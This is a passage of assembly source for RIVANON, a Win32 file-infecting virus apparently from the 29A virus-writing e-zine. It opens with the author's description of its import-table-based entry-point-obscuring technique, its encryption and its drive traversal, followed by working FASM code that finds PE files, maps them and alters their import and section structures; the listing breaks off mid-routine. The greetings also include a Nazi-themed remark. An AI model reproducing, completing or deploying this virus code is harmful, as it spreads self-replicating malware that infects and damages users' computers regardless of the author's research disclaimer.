29a-7.015

从29A上收集的病毒源码

;RIVANON virus, version 3.9 by Doxtor L. [TKT], June 2003.
;Contact: doxtorl38@yahoo.fr

;This source code is intended to be compiled using FASM, an open source
;assembler easily available on the web.



;Some not so usual features:

;* This virus don't change entry point of infected programs.
;* This virus don't patch opcodes of infected programs.
;* This virus don't change section attributes of infected programs.


;Here a list of some standard features used:

;* Use of a thread to make the virus 'residant'.
;* Use of hash codes to retrieve functions of Kernel32 needed.
;* Use of a traversal directory routine to parse all drives.
;* Use of SEH to make the virus more stable.
;* Use of the last section to put the main part of virus.
;* Use of encryption with a 'random' key.
;* Use of mutex to avoid to have several instances of virus infecting
;  in same time.



;How does this virus work?

;This virus is my new attempt to use a non-standard E.P.O (entry point
;obscuring) technique. My last attempt in the same way was the writing of 
;idele virus. Unfortunately this virus was a bit limited to not say buggy.
;I think RIVANON virus fixes the main 'bug' of idele virus yet RIVANON was
;totally re-written.

;The idea is to create a new import table therefore the 'old' table will be
;not changed when Windows will load the program in memory but the program will
;continue to 'believe' this table is still alright.The 'old' table can be fill
;up with addresses we want. These addresses will be pointing to addresses of
;elements of a 'push table'. What's that?  

;When a host program will call a function from Kernel32 several push's will be
;executed depending wich function is called. The number of push's executed
;will be used to know wich function of Kernel32 was called by host program.
;Sometime, Idele virus wasn't able to know wich function was called.
;After the push's, there is a small routine used to decrypt and allocate some
;memory to put the main part of virus there. GlobalAlloc function from
;Kernel32 is used to achieve this. For Windows this function is the only one
;imported from Kernel32 by an infected program.

;The virus will put a loader routine in the end of code section of target
;programs. A data section with 'writeable' attribute will be used to put the
;new 'import table'. The main code will be put in the end of last section.

;This virus was tested on both Windows98 SE and Windows 2000.
;Main tests were performed on notepad.exe and calc.exe from Windows98,
;These programs when they were infected were still running fine on both
;Windows 98 and Windows 2000. For Windows XP i don't have a clue because
;i don't use it.


;Here a list of macros and subroutines used:

;* proc_infectieuse				: start of thread code
;* GEN_ALEATOIRE				; random generator
;* RECHERCHE_CIBLE_DANS_REPERTOIRE_COURANT	: routine to find targets
;						  in current directory
;* INFECTION					: routine to modify target
;* proc_seh					: seh handler
;* copie_chaine					: routine to copy ASCII
						; string null terminated.
;* rva_vers_adr_map				; rva to map address routine
;* adr_map_vers_rva				; map address to rva routine
;* aligne					; align section size fields
;* debut_loader					; loader routine




;The source code has some comments in french. Anyway, this source code
;isn't intended to be read by beginners in vx world. The advanced vxers
;don't really need comments to understand how this code works, the code is
;enough structured to make it readable without comments.



;DISCLAIMER:

;This program is a virus, it's not destructive but has ability to infect
;all O.S Win32 based computers. I don't release this source code to be used
;to infect innocent user puters. It was created for research aims.

;Your are the only responsible if you decide to run it.

;IF YOU DON'T KNOW WHAT YOU'RE DOING, DON'T COMPILE IT!


;Greetings:


;Virusbuster    : Thanks to publish my stuff.
;Lord Julus 	: For your working search traversal routine.
;Darkman	: A good nazi can sing Horst Vessel lied by heart.
;Morphie	: Too bad we didn't meet in Paris.
;Gigabyte	: Editing a vx e-zine is a hard job you're right.
;Toofic		: I'm not a pervert old man.
;Mandrag0re	: Who's the next to be hacked?
;Emper0r	: Thanks to publish my stuff in IOC.
;Delly		: A good magician can make disappear everything..but you're
;		  the greatest, you can make appear weed everywhere!
;Cryptic	: I remember i must install my network card.
;Gato		: I hope everything is alright now, no news from you.
;Slagehammer	: A new sample  for your collection.
;Vecna		: I'm wondering what is your contribution to 29a7!

;And all members of TKT group

	 	
;IN MEMORY OF T2




format PE GUI
entry commencement

include		'include\macro\import.inc'
include		'include\macro\stdcall.inc'
include		'include\exehdr.inc'
include		'include\kernel.inc'



DEBUG=TRUE
ADR_BASE=400000h
ALIGNEMENT_FICHIER_STANDARD=200h
ALIGNEMENT_MEMOIRE_STANDARD=1000h
DUREE_PAUSE1=120000
DUREE_PAUSE2=30000
MODULE=4235536237
SIGNATURE_VIRAL equ 'VX'

if DEBUG=TRUE
TYPE_FICHIER_RECHERCHE0 equ 'e'
SEH=FALSE
display "YOU'RE COMPILING THE DEBUG VERSION OF RIVANON VIRUS",CRLF
else
TYPE_FICHIER_RECHERCHE0 equ '*'
SEH=TRUE
display "YOU'RE COMPILING INFECTIOUS VERSION OF RIVANON VIRUS",CRLF
end if
display "IF YOU DON'T KNOW WHAT YOU'RE DOING PLEASE ERASE THIS PROGRAM",CRLF

TYPE_FICHIER_RECHERCHE1	equ 'x.ex'
TOUT_FICHIER		equ '*'
REMONTE			equ '..'
REPERTOIRE_COURANT	equ '.'
REPERTOIRE_PARENT	equ REMONTE
DERNIER_3_BIT=111b



;'strutures':
IMAGE_DOS_HEADER	ecx,edx,edi
IMAGE_FILE_HEADER	ecx,edx,esi
IMAGE_OPTIONAL_HEADER	edx,edi
IMAGE_SECTION_HEADER	esi,edi
IMAGE_DATA_DIRECTORY	eax,esi
IMAGE_IMPORT_DESCRIPTOR	esi
IMAGE_IMPORT_BY_NAME	eax
IMAGE_EXPORT_DIRECTORY	eax
WIN32_FIND_DATA		edi,eax

adr_mem_alloc dd 0


;macros utilisees par le virus:

macro GEN_ALEATOIRE
{

;generateur aleatoire base sur BBS:
pushad
mov ebx,MODULE
mov eax,[seed+ebp]
mul eax
div ebx
mov [seed+ebp],edx
popad
}

;[Debut du code de la fonction principale du virus]:

macro	INFECTION
{

infection:

pushad

if SEH=TRUE
push ebp
lea eax,[proc_seh+ebp]
push eax dword [fs:0]
mov dword [fs:0],esp
end if

;[Ouverture du fichier cible et creation de son image memoire]:

lea edi,[struct_recherche+ebp]
lea esi,[edi.WFD_szFileName]
stdcall [SetFileAttributesA+ebp],esi,FILE_ATTRIBUTE_NORMAL

add dword [edi.WFD_nFileSizeLow],TAILLE_VIRUS_ALIGNE_FICHIER

xor ebx,ebx
stdcall [CreateFileA+ebp],esi,GENERIC_READ or GENERIC_WRITE,\
FILE_SHARE_READ,ebx,OPEN_EXISTING,ebx,ebx
inc eax
jz err_infection
dec eax
mov [handle_fichier_cible+ebp],eax

stdcall [CreateFileMappingA+ebp],eax,ebx,PAGE_READWRITE,ebx,\
dword [edi.WFD_nFileSizeLow],ebx
test eax,eax
jz err_infection
mov [handle_map_cible+ebp],eax

stdcall [MapViewOfFile+ebp],eax,FILE_MAP_ALL_ACCESS,ebx,ebx,ebx
test eax,eax
jz err_infection

mov [adr_map_cible+ebp],eax
mov edx,eax

;[Fin de la creation de l'image memoire du fichier cible]

;[Debut de la verification du fichier cible]:

cmp word [edx.MZ_magic],MZ_MAGIC
jnz err_infection

movzx eax,word [edx.MZ_csum]
cmp word [edx.MZ_csum],SIGNATURE_VIRAL
jz err_infection

mov eax,dword [edx.MZ_lfanew]
cmp eax,dword [edi.WFD_nFileSizeLow]
jae err_infection

add edx,eax
mov [adr_map_IMAGE_FILE_HEADER_cible+ebp],edx

cmp dword [edx.FH_Signature],PE_MAGIC
jnz err_infection


;[Debut de la recherche de la section 'code', la section qui contient
;le point d'entree du programme cible]:

movzx ebx,word [edx.FH_SizeOfOptionalHeader]
movzx ecx,word [edx.FH_NumberOfSections]
push ecx
add edx,sizeof.IMAGE_FILE_HEADER

mov [adr_map_IMAGE_OPTIONAL_HEADER_cible+ebp],edx

mov dword [edx.OH_FileAlignment],ALIGNEMENT_FICHIER_STANDARD


mov eax,dword [edx.OH_ImageBase]
mov [adr_image_base+ebp],eax

;a partir d'ici la variable adr_image_base concerne la cible

mov eax,dword [edx.OH_AddressOfEntryPoint]
add edx,ebx
mov [adr_map_IMAGE_SECTION_HEADER_cible+ebp],edx
mov esi,edx

recherche_section_code:
cmp dword [esi.SH_VirtualAddress],eax
ja section_code_trouve
add esi,sizeof.IMAGE_SECTION_HEADER
loop recherche_section_code

jmp err_infection


section_code_trouve:
;[Fin de la routine de recherche de la section 'code];


;[Debut de la localisation d'un espace 'vide' et de sa taille dans
;la fin de la section 'code']:
mov edi,dword [esi.SH_PointerToRawData]
add edi,[adr_map_cible+ebp]
dec edi
std
xor eax,eax
xor ecx,ecx
dec ecx
rep scasb
neg ecx
sub ecx,10	;pour tenir compte de la presence eventuelle d'une
add edi,10	;'table d'import' (celle ci se finissant par db 0,0,0,0)
		
mov [nbre_octet_libre_sect_code_cible+ebp],ecx
mov [adr_map_espace_libre_sect_code_cible+ebp],edi

sub esi,sizeof.IMAGE_SECTION_HEADER
call aligne
pop ecx

;si la section code a l'attribut ecriture mieux vaut abandonner l'infection:
test dword [esi.SH_Characteristics],IMAGE_SCN_MEM_WRITE
jnz err_infection

;[Fin de la localisation d'un espace dans la section 'code']




;[Debut de la localisation d'un espace vide a la fin d'une section 'data']:

mov esi,edx

recherche_section_data:
test dword [esi.SH_Characteristics],IMAGE_SCN_MEM_WRITE
jnz section_data_trouve
add esi,sizeof.IMAGE_SECTION_HEADER
loop recherche_section_data

jmp err_infection

section_data_trouve:
cmp dword [esi.SH_PointerToRawData],0
jz recherche_section_data

dec ecx
jz err_infection
inc ecx

mov edi,dword [esi.SH_PointerToRawData+sizeof.IMAGE_SECTION_HEADER]
add edi,[adr_map_cible+ebp]

sub edi,4
cmp dword [edi],0
jnz recherche_section_data
sub edi,4
cmp dword [edi],0
jnz recherche_section_data

mov [adr_map_espace_libre_sect_data_cible+ebp],edi
call aligne

;[Fin de la localisation d'un espace vide dans la section 'data']



;[Recherche de le structure IMAGE_IMPORT_DESCRIPTOR dediee aux imports
;de Kernel32]:

mov edx,[adr_map_IMAGE_OPTIONAL_HEADER_cible+ebp]
lea esi,[edx+sizeof.IMAGE_OPTIONAL_HEADER+sizeof.IMAGE_DATA_DIRECTORY]

;esi pointe sur la structure IMAGE_DATA_DIRECTORY dediee a l'import:
mov esi,dword [esi.DD_VirtualAddress]


stdcall rva_vers_adr_map,esi
mov esi,eax

sub esi,sizeof.IMAGE_IMPORT_DESCRIPTOR

recherche_k32_image_import_descriptor:

add esi,sizeof.IMAGE_IMPORT_DESCRIPTOR
mov edi,dword [esi.ID_Name]
test edi,edi
jz err_infection

stdcall rva_vers_adr_map,edi
mov edi,eax

cmp dword [edi],'KERN'
jnz recherche_k32_image_import_descriptor

add edi,4

cmp dword [edi],'EL32'
jnz recherche_k32_image_import_descriptor

mov [adr_map_IMAGE_IMPORT_DESCRIPTOR_cible+ebp],esi

;[Fin de la recherche de la structure IMAGE_IMPORT_DESCRIPTOR]

mov eax,[esi.ID_FirstThunk]
push eax
add eax,[adr_image_base+ebp]
mov [adr_1st_thunk_avant_infection_hote+ebp],eax
pop eax

stdcall rva_vers_adr_map,eax
mov [adr_map_1st_thunk_k32_cible+ebp],eax

mov esi,dword [esi.ID_OriginalFirstThunk]
test esi,esi
jz err_infection

mov [rva_orig_1st_thunk_avant_infection_hote+ebp],esi

stdcall rva_vers_adr_map,esi
mov [adr_map_original_1st_thunk_k32_cible+ebp],eax



;[Debut du calcul du nombre de fonctions de Kernel32 importees par le
;programme cible]:

mov esi,eax
mov edi,eax
cld
xor eax,eax
xor ecx,ecx
dec ecx
repne scasd
neg ecx
dec ecx
dec ecx

mov [nbre_fct_k32_cible+ebp],ecx

lea ebx,[ecx+TAILLE_LOADER+2*sizeof.IMAGE_THUNK_DATA]
mov ecx,[nbre_octet_libre_sect_code_cible+ebp]
sub ecx,ebx
jl err_infection

add [adr_map_espace_libre_sect_code_cible+ebp],ecx

;[Fin du calcul du nombre de fonctions importees de Kernel32]

mov ebx,esi

;[Recherche d'une fonction de Kernel32 importee par la cible
;dont le nom a au moins 11 symboles]:

xor ebx,ebx
dec ebx

recherche_nom_fct_k32_cible:
inc ebx
lodsd
test eax,eax
jz err_infection

mov [rva_IMAGE_IMPORT_BY_NAME_cible+ebp],eax
mov ecx,eax
stdcall rva_vers_adr_map,eax
lea edi,[eax.IBN_Name]
mov edx,edi

pushad
xor eax,eax
xor ecx,ecx
mov cl,11
repne scasb
popad
jz recherche_nom_fct_k32_cible


;[Fin de la verification du fichier cible]



pushad
mov esi,edx
mov word [esi-2],0
mov [index_fct_k32_altere_hote+ebp],ebx
lea edi,[sz_nom_fct_k32_altere_hote+ebp]
call copie_chaine

lea esi,[sz_nom_globalalloc+ebp]

mov edi,edx
call copie_chaine
popad

;[Fin de la recherche d'une fonction de Kernel32 importee dont le nom a au
;moins 11 symboles]


;mov edi,[adr_map_espace_libre_sect_code_cible+ebp]
mov edi,[adr_map_espace_libre_sect_data_cible+ebp]


stdcall adr_map_vers_rva,edi
mov ebx,eax

mov eax,[rva_IMAGE_IMPORT_BY_NAME_cible+ebp]

stosd		;la RVA de la structure IMAGE_IMPORT_BY_NAME de Kernel32 est
		;transferee dans la section code. La RVA de l'emplacement
		;contenant ceci sera la nouvelle valeur FirstThunk de la
		;cible.